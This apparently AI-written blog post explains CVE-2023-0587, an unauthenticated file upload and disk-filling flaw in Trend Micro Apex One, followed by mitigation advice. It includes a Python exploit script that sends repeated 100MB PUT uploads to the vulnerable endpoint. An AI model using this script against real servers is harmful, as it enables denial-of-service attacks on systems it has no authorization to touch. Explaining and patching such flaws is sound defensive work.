---
Introduction
In early 2023, security researchers uncovered a critical file upload vulnerability (CVE-2023-0587) affecting Trend Micro Apex One server build 11110. This exploit allows unauthenticated remote attackers to upload any files they want into a directory on the Apex One server. Even worse, by manipulating the Content-Length header in the HTTP request, an attacker can continue uploading as many large files as possible, potentially filling the server's disk and causing a denial of service.
In this post, I’ll break down how this vulnerability works in plain language, provide sample code on how it can be exploited, and share references and mitigation advice.
---
What is CVE-2023-0587?
CVE-2023-0587 is a vulnerability found in Trend Micro Apex One’s file upload feature for sample submissions. The problem exists in how the server handles a malformed Content-Length HTTP header in HTTP PUT requests sent to the /officescan/console/html/cgi/fcgiOfcDDA.exe endpoint.
An attacker, without logging in, can send a specially crafted HTTP request and upload any file to the directory:
C:\Program Files (x86)\Trend Micro\OfficeScan\PCCSRV\TEMP\SampleSubmission
Since the server doesn’t properly validate the header or enforce authorization, the attacker can upload as many or as large files as they want, which can eventually fill up the available disk space and take the server offline.
---
The attack targets the following Apex One server endpoint
/officescan/console/html/cgi/fcgiOfcDDA.exe
This endpoint is supposed to be used for automated sample submissions—like malware files that need analysis. But due to missing security checks, attackers can abuse it.
2. Exploiting the Content-Length Header
When you upload a file via HTTP, you normally send a Content-Length header indicating the size of the file. In Apex One server build 11110, this header is not properly validated. If you craft a wrong or very large number for Content-Length, the server reads the data and saves it without authentication.
3. No Authentication Needed
No username or password is required! This attack is totally unauthenticated—anyone who knows the URL can attempt it.
All uploaded files go to this location
C:\...\PCCSRV\TEMP\SampleSubmission\
The attacker has no control over the full path, but can pick the filename as desired.
---
Exploit Code Example
Below is a basic Python3 script using the requests library to upload a dummy file of any size to the vulnerable server. Replace TARGET_SERVER with the actual domain or IP.
import requests
TARGET_SERVER = "https://victim.example.com"; # <-- CHANGE ME
UPLOAD_ENDPOINT = "/officescan/console/html/cgi/fcgiOfcDDA.exe"
FILE_NAME = "evil_payload.bin"
FILE_SIZE = 100 * 1024 * 1024 # 100MB
# Create big file in memory
payload = b"A" * FILE_SIZE
url = f"{TARGET_SERVER}{UPLOAD_ENDPOINT}?samplefilename={FILE_NAME}"
headers = {
"Content-Type": "application/octet-stream",
"Content-Length": str(FILE_SIZE)
}
print(f"Uploading {FILE_NAME} to {url}")
resp = requests.put(url, data=payload, headers=headers, verify=False)
print("Status code:", resp.status_code)
# Repeat as needed to fill up the disk
> Warning: Do not try this against servers you do not own. It is illegal without permission.
---
What Could Attackers Do?
- Denial of Service: Uploading many huge files will eventually fill the disk, causing the server to stop working.
- Persistence: Uploaded files remain in the SampleSubmission folder until manually deleted or the server is cleaned.
Obfuscation: Files could be named to blend in, making it hard for admins to detect.
---
## Proof of Concept Video / Original References
- Original Trend Micro Advisory (official fix and mitigation)
- Vulnerability Disclosure at NVD
- Trend Micro Security Bulletin (if available)
---
Mitigation
Update Immediately. Trend Micro has released patched builds that validate the Content-Length header and require authentication. Follow their instructions:
Apply the latest hotfix or service pack for Apex One
- Disable public access to /officescan/console/html/cgi/fcgiOfcDDA.exe via firewall
Regularly monitor disk usage and cleanup the SampleSubmission directory
---
Wrap Up
CVE-2023-0587 is a classic example of a simple input validation failure (in this case, a HTTP header) leading to a critical unauthenticated file upload bug. If you run Trend Micro Apex One build 11110 or similar, upgrade as soon as possible. Attackers don’t need credentials, and attack tools are very easy to write.
Stay safe and keep your software updated!
---
More Reading
- CVE Details for CVE-2023-0587
- Trend Micro Security Advisories
*Written exclusively for you by AI—stay secure!*
Timeline
Published on: 02/01/2023 03:15:00 UTC
Last modified on: 02/07/2023 22:44:00 UTC